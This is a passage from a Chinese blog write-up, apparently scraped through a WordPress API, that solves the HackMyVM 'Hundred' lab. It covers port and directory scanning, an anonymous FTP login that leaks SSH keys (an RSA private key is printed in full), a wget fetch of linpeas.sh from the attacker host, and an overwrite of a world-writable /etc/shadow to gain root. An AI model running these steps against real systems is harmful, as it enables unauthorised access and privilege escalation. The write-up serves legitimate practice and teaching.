groups=1000(hmv),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)\nhmv@hundred:~$ ls -la\ntotal 40\ndrwxr-xr-x 4 hmv hmv 4096 Aug 2 2021 .\ndrwxr-xr-x 3 root root 4096 Aug 2 2021 ..\n-rw------- 1 hmv hmv 23 Aug 2 2021 .bash_history\n-rw-r--r-- 1 hmv hmv 220 Aug 2 2021 .bash_logout\n-rw-r--r-- 1 hmv hmv 3526 Aug 2 2021 .bashrc\ndrwxr-xr-x 3 hmv hmv 4096 Aug 2 2021 .local\n-rw-r--r-- 1 hmv hmv 807 Aug 2 2021 .profile\ndrwx------ 2 hmv hmv 4096 Aug 2 2021 .ssh\n-rw------- 1 hmv hmv 12 Aug 2 2021 user.txt\n-rw------- 1 hmv hmv 53 Aug 2 2021 .Xauthority\nhmv@hundred:~$ cat user.txt \nHMV100vmyay\nhmv@hundred:~$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/mount\n\/usr\/bin\/umount\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/newgrp\n\/usr\/bin\/su\n\/usr\/bin\/gpasswd\n\/usr\/bin\/passwd\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\nhmv@hundred:~$ sudo -l\n-bash: sudo: command not found\nhmv@hundred:~$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:102:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\nhmv:x:1000:1000:hmv,,,:\/home\/hmv:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nftp:x:105:113:ftp daemon,,,:\/srv\/ftp:\/usr\/sbin\/nologin\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nhmv@hundred:~$ cat \/etc\/shadow\ncat: \/etc\/shadow: Permission denied\nhmv@hundred:~$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/ping = cap_net_raw+ep<\/code><\/pre>\n\u4e0a\u4f20linpeas.sh<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.0.159 - - [24\/Apr\/2024 01:49:41] "GET \/linpeas.sh HTTP\/1.1" 200 -<\/code><\/pre>\nhmv@hundred:~$ wget http:\/\/192.168.0.143:8888\/linpeas.sh\n--2024-04-24 01:49:46-- http:\/\/192.168.0.143:8888\/linpeas.sh\nConnecting to 192.168.0.143:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 860549 (840K) [text\/x-sh]\nSaving to: \u2018linpeas.sh\u2019\n\nlinpeas.sh 100%[=========================================================================>] 840.38K --.-KB\/s in 0.03s \n\n2024-04-24 01:49:46 (24.2 MB\/s) - \u2018linpeas.sh\u2019 saved [860549\/860549]\n\nhmv@hundred:~$ chmod +x linpeas.sh<\/code><\/pre>\n\u8fd0\u884c\u770b\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u8fd9\u4e2a\u6587\u4ef6\u6240\u6709\u4eba\u53ef\u5199\uff0c\u6240\u4ee5\u6dfb\u52a0\u4e00\u4e2a\u5bc6\u94a5\u8fdb\u884c\u5c31\u884c\u4e86\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ openssl passwd\nPassword: \nVerifying - Password: \n# \u5bc6\u7801\u6539\u4e3aroot\u4e86\necho 'root:qdbEWfKM1ov2g:18888:0:99999:7:::' > \/etc\/shadow<\/code><\/pre>\n\n\/etc\/shadow \u6587\u4ef6\u7684\u5185\u5bb9\u5305\u62ec9\u4e2a\u5b57\u6bb5<\/p>\n
\u7528\u6237\u540d:\u5bc6\u7801:\u4e0a\u6b21\u4fee\u6539\u5bc6\u7801\u7684\u65f6\u95f4:\u4e24\u6b21\u4fee\u6539\u53e3\u4ee4\u95f4\u9694\u6700\u5c11\u7684\u5929\u6570:\u4e24\u6b21\u4fee\u6539\u53e3\u4ee4\u95f4\u9694\u6700\u591a\u7684\u5929\u6570:\u63d0\u524d\u591a\u5c11\u5929\u8b66\u544a\u7528\u6237\u53e3\u4ee4\u5c06\u8fc7\u671f:\u5728\u53e3\u4ee4\u8fc7\u671f\u4e4b\u540e\u591a\u5c11\u5929\u7981\u7528\u6b64\u7528\u6237:\u7528\u6237\u8fc7\u671f\u65e5\u671f:\u4fdd\u7559\u5b57\u6bb5<\/strong><\/p>\n\u7528\u6237\u540d<\/strong>:\u5728\/etc\/shadow\u4e2d\uff0c\u7528\u6237\u540d\u548c\/etc\/passwd \u662f\u76f8\u540c\u7684\uff0c\u8fd9\u6837\u5c31\u628apasswd \u548cshadow\u4e2d\u7528\u7684\u7528\u6237\u8bb0\u5f55\u8054\u7cfb\u5728\u4e00\u8d77\uff1b\u8fd9\u4e2a\u5b57\u6bb5\u662f\u975e\u7a7a\u7684\uff1b<\/p>\n\u5bc6\u7801<\/strong>(\u5df2\u88ab\u52a0\u5bc6):\u5982\u679c\u662f\u6709\u4e9b\u7528\u6237\u5728\u8fd9\u6bb5\u662fx\uff0c\u8868\u793a\u8fd9\u4e2a\u7528\u6237\u4e0d\u80fd\u767b\u5f55\u5230\u7cfb\u7edf\uff1b\u8fd9\u4e2a\u5b57\u6bb5\u662f\u975e\u7a7a\u7684\uff1b<\/p>\n\u4e0a\u6b21\u4fee\u6539\u53e3\u4ee4\u7684\u65f6\u95f4<\/strong>:\u8fd9\u4e2a\u65f6\u95f4\u662f\u4ece1970\u5e7401\u670801\u65e5\u7b97\u8d77\u5230\u6700\u8fd1\u4e00\u6b21\u4fee\u6539\u53e3\u4ee4\u7684\u65f6\u95f4\u95f4\u9694\uff08\u5929\u6570\uff09\uff0c\u60a8\u53ef\u4ee5\u901a\u8fc7passwd \u6765\u4fee\u6539\u7528\u6237\u7684\u5bc6\u7801\uff0c\u7136\u540e\u67e5\u770b\/etc\/shadow\u4e2d\u6b64\u5b57\u6bb5\u7684\u53d8\u5316\uff1b<\/p>\n\u4e24\u6b21\u4fee\u6539\u53e3\u4ee4\u95f4\u9694\u6700\u5c11\u7684\u5929\u6570<\/strong>:\u5982\u679c\u8bbe\u7f6e\u4e3a0,\u5219\u7981\u7528\u6b64\u529f\u80fd\uff0c\u4e5f\u5c31\u662f\u8bf4\u7528\u6237\u5fc5\u987b\u7ecf\u8fc7\u591a\u5c11\u5929\u624d\u80fd\u4fee\u6539\u5176\u53e3\u4ee4\uff1b\u6b64\u9879\u529f\u80fd\u7528\u5904\u4e0d\u662f\u592a\u5927\uff1b\u9ed8\u8ba4\u503c\u662f\u901a\u8fc7\/etc\/login.defs\u6587\u4ef6\u5b9a\u4e49\u4e2d\u83b7\u53d6\uff0cPASS_MIN_DAYS \u4e2d\u6709\u5b9a\u4e49\uff1b<\/p>\n\u4e24\u6b21\u4fee\u6539\u53e3\u4ee4\u95f4\u9694\u6700\u591a\u7684\u5929\u6570\uff1a<\/strong>\u8fd9\u4e2a\u80fd\u589e\u5f3a\u7ba1\u7406\u5458\u7ba1\u7406\u7528\u6237\u53e3\u4ee4\u7684\u65f6\u6548\u6027\uff0c\u5e94\u8be5\u8bf4\u5728\u589e\u5f3a\u4e86\u7cfb\u7edf\u7684\u5b89\u5168\u6027\uff1b\u5982\u679c\u662f\u7cfb\u7edf\u9ed8\u8ba4\u503c\uff0c\u662f\u5728\u6dfb\u52a0\u7528\u6237\u65f6\u7531\/etc\/login.defs\u6587\u4ef6\u5b9a\u4e49\u4e2d\u83b7\u53d6\uff0c\u5728PASS_MAX_DAYS \u4e2d\u5b9a\u4e49\uff1b<\/p>\n\u63d0\u524d\u591a\u5c11\u5929\u8b66\u544a\u7528\u6237\u53e3\u4ee4\u5c06\u8fc7\u671f:<\/strong>\u5f53\u7528\u6237\u767b\u5f55\u7cfb\u7edf\u540e\uff0c\u7cfb\u7edf\u767b\u5f55\u7a0b\u5e8f\u63d0\u9192\u7528\u6237\u53e3\u4ee4\u5c06\u8981\u4f5c\u5e9f\uff1b\u5982\u679c\u662f\u7cfb\u7edf\u9ed8\u8ba4\u503c\uff0c\u662f\u5728\u6dfb\u52a0\u7528\u6237\u65f6\u7531\/etc\/login.defs\u6587\u4ef6\u5b9a\u4e49\u4e2d\u83b7\u53d6\uff0c\u5728PASS_WARN_AGE \u4e2d\u5b9a\u4e49\uff1b<\/p>\n\u5728\u53e3\u4ee4\u8fc7\u671f\u4e4b\u540e\u591a\u5c11\u5929\u7981\u7528\u6b64\u7528\u6237<\/strong>:\u6b64\u5b57\u6bb5\u8868\u793a\u7528\u6237\u53e3\u4ee4\u4f5c\u5e9f\u591a\u5c11\u5929\u540e\uff0c\u7cfb\u7edf\u4f1a\u7981\u7528\u6b64\u7528\u6237\uff0c\u4e5f\u5c31\u662f\u8bf4\u7cfb\u7edf\u4f1a\u4e0d\u80fd\u518d\u8ba9\u6b64\u7528\u6237\u767b\u5f55\uff0c\u4e5f\u4e0d\u4f1a\u63d0\u793a\u7528\u6237\u8fc7\u671f\uff0c\u662f\u5b8c\u5168\u7981\u7528\uff1b<\/p>\n\u7528\u6237\u8fc7\u671f\u65e5\u671f<\/strong>:\u6b64\u5b57\u6bb5\u6307\u5b9a\u4e86\u7528\u6237\u4f5c\u5e9f\u7684\u5929\u6570\uff08\u4ece1970\u5e74\u76841\u67081\u65e5\u5f00\u59cb\u7684\u5929\u6570\uff09\uff0c\u5982\u679c\u8fd9\u4e2a\u5b57\u6bb5\u7684\u503c\u4e3a\u7a7a\uff0c\u5e10\u53f7\u6c38\u4e45\u53ef\u7528\uff1b<\/p>\n\u4fdd\u7559\u5b57\u6bb5:<\/strong>\u76ee\u524d\u4e3a\u7a7a\uff0c\u4ee5\u5907\u5c06\u6765Linux\u53d1\u5c55\u4e4b\u7528\uff1b<\/p>\n<\/blockquote>\n\u7136\u540e\u62ff\u5230flag\uff01\uff01\uff01\uff01<\/p>\n
hmv@hundred:~$ su -l root\nPassword: \nroot@hundred:~# ls -la\ntotal 28\ndrwx------ 3 root root 4096 Aug 2 2021 .\ndrwxr-xr-x 18 root root 4096 Aug 2 2021 ..\n-rw------- 1 root root 16 Aug 2 2021 .bash_history\n-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc\ndrwxr-xr-x 3 root root 4096 Aug 2 2021 .local\n-rw-r--r-- 1 root root 148 Aug 17 2015 .profile\n-rw------- 1 root root 15 Aug 2 2021 root.txt\nroot@hundred:~# cat root.txt \nHMVkeephacking<\/code><\/pre>\n\u989d\u5916\u6536\u83b7<\/h2>\n\u4e0b\u8f7dftp\u6587\u4ef6<\/h3>\n
\u4f7f\u7528mget *<\/code>\u53ef\u4ee5\u6279\u91cf\u4e0b\u8f7d\u6587\u4ef6\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"Hundred \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred] \u2514\u2500$ s […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-620","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/620","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=620"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/620\/revisions"}],"predecessor-version":[{"id":621,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/620\/revisions\/621"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=620"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=620"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=620"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ sudo nmap -sS 192.168.0.159\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-24 01:16 EDT\nNmap scan report for hundred (192.168.0.159)\nHost is up (0.000060s latency).\nNot shown: 997 closed tcp ports (reset)\nPORT STATE SERVICE\n21\/tcp open ftp\n22\/tcp open ssh\n80\/tcp open http\nMAC Address: 08:00:27:4E:15:8F (Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 0.43 seconds\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ rustscan -a 192.168.0.159 -- -A\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.159:21\nOpen 192.168.0.159:22\nOpen 192.168.0.159:80\n[~] Starting Script(s)\n[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")\n\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-24 01:17 EDT\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 01:17\nCompleted NSE at 01:17, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 01:17\nCompleted NSE at 01:17, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 01:17\nCompleted NSE at 01:17, 0.00s elapsed\nInitiating Ping Scan at 01:17\nScanning 192.168.0.159 [2 ports]\nCompleted Ping Scan at 01:17, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 01:17\nCompleted Parallel DNS resolution of 1 host. at 01:17, 0.00s elapsed\nDNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 01:17\nScanning hundred (192.168.0.159) [3 ports]\nDiscovered open port 21\/tcp on 192.168.0.159\nDiscovered open port 22\/tcp on 192.168.0.159\nDiscovered open port 80\/tcp on 192.168.0.159\nCompleted Connect Scan at 01:17, 0.00s elapsed (3 total ports)\nInitiating Service scan at 01:17\nScanning 3 services on hundred (192.168.0.159)\nCompleted Service scan at 01:17, 6.12s elapsed (3 services on 1 host)\nNSE: Script scanning 192.168.0.159.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 01:17\nNSE: [ftp-bounce 192.168.0.159:21] PORT response: 500 Illegal PORT command.\nCompleted NSE at 01:17, 0.70s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 01:17\nCompleted NSE at 01:17, 0.01s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 01:17\nCompleted NSE at 01:17, 0.00s elapsed\nNmap scan report for hundred (192.168.0.159)\nHost is up, received syn-ack (0.00046s latency).\nScanned at 2024-04-24 01:17:02 EDT for 7s\n\nPORT STATE SERVICE REASON VERSION\n21\/tcp open ftp syn-ack vsftpd 3.0.3\n| ftp-syst: \n| STAT: \n| FTP server status:\n| Connected to ::ffff:192.168.0.143\n| Logged in as ftp\n| TYPE: ASCII\n| No session bandwidth limit\n| Session timeout in seconds is 300\n| Control connection is plain text\n| Data connections will be plain text\n| At session startup, client count was 1\n| vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| -rwxrwxrwx 1 0 0 435 Aug 02 2021 id_rsa [NSE: writeable]\n| -rwxrwxrwx 1 1000 1000 1679 Aug 02 2021 id_rsa.pem [NSE: writeable]\n| -rwxrwxrwx 1 1000 1000 451 Aug 02 2021 id_rsa.pub [NSE: writeable]\n|_-rwxrwxrwx 1 0 0 187 Aug 02 2021 users.txt [NSE: writeable]\n22\/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n| 2048 ef:28:1f:2a:1a:56:49:9d:77:88:4f:c4:74:56:0f:5c (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDbKM571Elw344\/eLnr7NhTAOVHtqhEITrCuF0mFc5\/ZiSN54vnhfTrt6JW8mj09y8vOTbsC+nhdoC6vFFGHAesozqQcndm3LXzwz4yIujhaF3IljcS0hdKGniUY1\/sHW680oixdOEHQT8cSeEosAVNc1To4YwNo1hYUsuhbNtD\/dG4WIIybOHeWgUrEHfnu4Q+Q7K3kevOy3b4aSZfc43Qa7nezkrjzRH3iy5tyMQV5SWdow4Jb25z3zqJCBVdB0UkYWzB0scx95N9OSh5g\/Ph799VKKgtkfyBNEyPTQ7mbK1ZwsPTWOCAHB33Y4j+rgQ9DREgZsNtU0KBbU9Bu8Sd\n| 256 1d:8d:a0:2e:e9:a3:2d:a1:4d:ec:07:41:75:ce:47:0e (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHJc9irXjsz0dU9g6bOq6koDsj8BPZ30XoWjK\/E9M+mZ6gJdPlnEVvd9KHiRP+QiPjc1NZfVbIUy4RiX\/ev1Iw8=\n| 256 06:80:3b:fc:c5:f7:7d:c5:58:26:83:c4:f7:7e:a3:d9 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEAOTtpmhQ63cGzZAoANc8fAevbCpwQ7q8ymO+TP7Gp\/\n80\/tcp open http syn-ack nginx 1.14.2\n|_http-server-header: nginx\/1.14.2\n| http-methods: \n|_ Supported Methods: GET HEAD\n|_http-title: Site doesn't have a title (text\/html).\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 01:17\nCompleted NSE at 01:17, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 01:17\nCompleted NSE at 01:17, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 01:17\nCompleted NSE at 01:17, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 7.47 seconds<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.159\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.0.159\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: jpg,txt,html,php,zip,bak\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html (Status: 200) [Size: 242]\n\/logo.jpg (Status: 200) [Size: 7277]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
<\/div><\/p>\n\u67e5\u770b\u6e90\u4ee3\u7801\uff1a<\/p>\n
<style>\n.center {\n display: block;\n margin-left: auto;\n margin-right: auto;\n key: h4ckb1tu5.enc;\n width: 50%;\n}\n<\/style>\n\n<img src="logo.jpg" class="center"> \n<h1>Thank you ALL!<\/h1>\n<h1>100 f*cking VMs!!<\/h1>\n\n<!-- l4nr3n, nice dir.--><\/code><\/pre>\n\u53d1\u73b0\u654f\u611f\u76ee\u5f55\uff1al4nr3n<\/code>\u4ee5\u53ca\u5bc6\u94a5h4ckb1tu5.enc<\/code><\/p>\n\u654f\u611f\u670d\u52a1\u63a2\u6d4b<\/h3>\n
\u5c1d\u8bd5ftp<\/code>\u533f\u540d\u767b\u5f55\u4e00\u4e0b\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ ftp 192.168.0.159 \nConnected to 192.168.0.159.\n220 (vsFTPd 3.0.3)\nName (192.168.0.159:kali): ftp\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> pwd\nRemote directory: \/\nftp> ls -la\n229 Entering Extended Passive Mode (|||42789|)\n150 Here comes the directory listing.\ndrwxr-xr-x 2 0 113 4096 Aug 02 2021 .\ndrwxr-xr-x 2 0 113 4096 Aug 02 2021 ..\n-rwxrwxrwx 1 0 0 435 Aug 02 2021 id_rsa\n-rwxrwxrwx 1 1000 1000 1679 Aug 02 2021 id_rsa.pem\n-rwxrwxrwx 1 1000 1000 451 Aug 02 2021 id_rsa.pub\n-rwxrwxrwx 1 0 0 187 Aug 02 2021 users.txt\n226 Directory send OK.\nftp> get users.txt\nlocal: users.txt remote: users.txt\n229 Entering Extended Passive Mode (|||61643|)\n150 Opening BINARY mode data connection for users.txt (187 bytes).\n100% |***********************************************************************************************************| 187 7.78 KiB\/s 00:00 ETA\n226 Transfer complete.\n187 bytes received in 00:00 (7.58 KiB\/s)\nftp> get id_rsa\nlocal: id_rsa remote: id_rsa\n229 Entering Extended Passive Mode (|||43755|)\n150 Opening BINARY mode data connection for id_rsa (435 bytes).\n100% |***********************************************************************************************************| 435 12.69 KiB\/s 00:00 ETA\n226 Transfer complete.\n435 bytes received in 00:00 (12.48 KiB\/s)\nftp> get id_rsa.pem\nlocal: id_rsa.pem remote: id_rsa.pem\n229 Entering Extended Passive Mode (|||20649|)\n150 Opening BINARY mode data connection for id_rsa.pem (1679 bytes).\n100% |***********************************************************************************************************| 1679 1.86 MiB\/s 00:00 ETA\n226 Transfer complete.\n1679 bytes received in 00:00 (1.12 MiB\/s)\nftp> get id_rsa.pub\nlocal: id_rsa.pub remote: id_rsa.pub\n229 Entering Extended Passive Mode (|||36855|)\n150 Opening BINARY mode data connection for id_rsa.pub (451 bytes).\n100% |***********************************************************************************************************| 451 764.63 KiB\/s 00:00 ETA\n226 Transfer complete.\n451 bytes received in 00:00 (470.54 KiB\/s)\nftp> exit\n221 Goodbye.<\/code><\/pre>\n\u770b\u4e00\u4e0b\u6709\u4e9b\u5565\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ ls -la\ntotal 24\ndrwxr-xr-x 2 kali kali 4096 Apr 24 01:20 .\ndrwxr-xr-x 66 kali kali 4096 Apr 24 01:16 ..\n-rw-r--r-- 1 kali kali 435 Aug 2 2021 id_rsa\n-rw-r--r-- 1 kali kali 1679 Aug 2 2021 id_rsa.pem\n-rw-r--r-- 1 kali kali 451 Aug 2 2021 id_rsa.pub\n-rw-r--r-- 1 kali kali 187 Aug 2 2021 users.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ cat id_rsa \n \/ \\\n \/ _ \\\n | \/ \\ |\n || || _______\n || || |\\ \\\n || || ||\\ \\\n || || || \\ |\n || || || \\__\/\n || || || ||\n \\\\_\/ \\_\/ \\_\/\/\n \/ _ _ \\\n \/ \\\n | O O |\n | \\ ___ \/ | \n \/ \\ \\_\/ \/ \\\n\/ ----- | --\\ \\\n| \\__\/|\\__\/ \\ |\n\\ |_|_| \/\n \\_____ _____\/\n \\ \/\n | |\n-------------------------\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ cat id_rsa.pem \n-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEAwsrHORyA+mG6HS9ZmZwzPmKHrHhA0\/kKCwNjUG8rmPVupv73\nmUsewpoGvYB9L9I7pUAsMscAb5MVo89d4b0z2RnXDD1fh6mKlTJmcNwWCnA1PgD+\nOwqewshpkCBhCV6O2P6dktfA8UI\/uqF6uT4QISU4ksriN16cOm\/89jHadetB8dCe\nh3Rx6HrFNccY8aiDRSA9meqz7YGE2+lJ\/NtwtndUkzzxKxuKC6z4gG780tZHhg83\nxVwZ9bxPyHfGqHWmV4yGsAgp7mot7pg9VzffnP6DAVnbReDDbhNLcnfVXEkBv8SQ\nL7OFIiKxJpoa1ADqGffA5LOPFdYKbbCFMictQQIDAQABAoIBAE4Q6IDp\/ILcEbPK\nmzUl1Z+l60visdCCGVVKmU3OEAHwMtV4j5B++6fwBM2Dpig5MDBNJKmA+Zq9rsmE\nvNJQemwCoB3Gpvd+qgybM1T9z1OFnsDnsvvEiNX1beEWKO2RWNx8RnhoQWovK81H\nFCETT3GJMkAaUUjxgNkmspGUb0IcP4YR61jpNy8thMLz8FQV8XqNSf4DSd9+8wrm\nFBFDFzso6zcBtsY6\/nDueaVfLsequU1Fdhh3itC6rPXync\/EWN0HJtaiKEVAytYE\ncvl1hVpRVhGZGjPqNQSPcknO0K2b22anRoiSpBoCzaopbSZHySFgcZM8oxGgw35j\nYpS1ULUCgYEA+1Se5s4AzsOX\/3RRwwF9Was\/\/oHU1N2JnJRetF9tjeFu8MEMnSec\na3bcPy+CZHB8oVnoyh647IObzPUjCgMxdyTLdfGmQ8RgzXhwYeQRe+ethrT\/Ra26\n7m+R+3838k5ZTKnwjBPreV\/i2AmwZYDPT2S5q5b7m5Cr4QTfsaScaKsCgYEAxmk\/\nxzu2XO8YmE+8R62nWdLPMaj4E5IPkT3uCA8G24KGSSyK29OGZ02RI8qxWkdqMxKJ\nrTDrQJ\/4oU6108Vhay0tyFswbNn0ymlHAhPKxXNr0xHkC6rCnDEnn6W7bspTxxyk\n9OUtl2UemtnEKRm3qu9Rc1qLFW0\/Zhxw3ovgWcMCgYEAka6HPPoD9dXicSyXiBWA\n900QlxHisFCJx70o+ByogClACUWdbirbvF71Y5rCVj3twAlBqocMYewXj0I4wUEA\nlzM4zHD6EyXthqxdWCC\/EbdFGmQn49fEFxmM4N7pKwbHNGz9BfU19PDjqJ5VJUD4\n6ehUx2WJCq9dMd2FXI8yKmkCgYAMBBnBtiMQM8a4irOrX5\/v961mo4YKoWDh+e8t\ne8N9jcUWL2VldMUCApeUpFTjU8nht\/CwlXLZ